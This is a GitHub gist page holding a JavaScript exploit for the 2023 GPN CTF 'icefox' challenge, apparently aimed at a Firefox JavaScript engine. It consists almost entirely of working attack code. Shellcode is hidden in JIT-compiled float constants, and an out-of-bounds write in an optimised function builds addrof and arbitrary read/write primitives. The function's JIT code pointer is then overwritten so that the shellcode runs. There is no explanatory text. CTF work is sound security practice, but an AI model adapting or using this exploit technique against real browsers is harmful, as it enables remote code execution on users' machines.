Skip to content

Instantly share code, notes, and snippets.

@anvbis

anvbis/2023_gpnctf_icefox.js

Created July 18, 2023 09:27
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save anvbis/43aab7b796dbdddc6a430162b37bb584 to your computer and use it in GitHub Desktop.
Save anvbis/43aab7b796dbdddc6a430162b37bb584 to your computer and use it in GitHub Desktop.
Download ZIP
2023_gpnctf_icefox.js
Raw
2023_gpnctf_icefox.js
let _buf = new ArrayBuffer(8);
let _flt = new Float64Array(_buf);
let _int = new BigUint64Array(_buf);
const itof = x => {
_int[0] = x;
return _flt[0];
};
const pwn = () => {
return [
1.8457939563e-314,
4.350248014025832e+199,
-6.032030672671943e-264,
1.6476837785e-314,
6.805647357708692e+38,
2.605888325577797e-284
];
};
for (let i = 0; i < 1_000_000; i++) {
pwn();
}
function foo(x) {
let arr = new Array(1.1, 2.2, 3.3);
let oob = new Array(1.1, 2.2, 3.3);
let rdw = new BigUint64Array(1);
let obj = new Array({a: 1}, {b: 2}, {c: 3});
arr[10 * x] = itof(0x133700000000n);
arr[11 * x] = itof(0x133700001337n);
return { oob, rdw, obj };
}
for (let i = 0; i < 1_000_000; i++) {
foo(0);
}
const { oob, rdw, obj } = foo(1);
const addrof = o => {
let tmp = oob[13];
oob[13] = oob[39];
obj[0] = o;
let ret = rdw[0] & 0xffffffffffffn;
oob[13] = tmp;
return ret;
};
const read = p => {
let tmp = oob[13];
oob[13] = itof(p);
let ret = rdw[0];
oob[13] = tmp;
return ret;
};
const write = (p, x) => {
let tmp = oob[13];
oob[13] = itof(p);
rdw[0] = x;
oob[13] = tmp;
};
let jit = read(addrof(pwn) + 0x28n);
let code = read(jit);
for (var i = 512n; i < 4096n; i++) {
if (read(code + i) == 0xdeadbeefn) break;
}
let shellcode = code + i + 8n;
write(jit, shellcode);
pwn();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment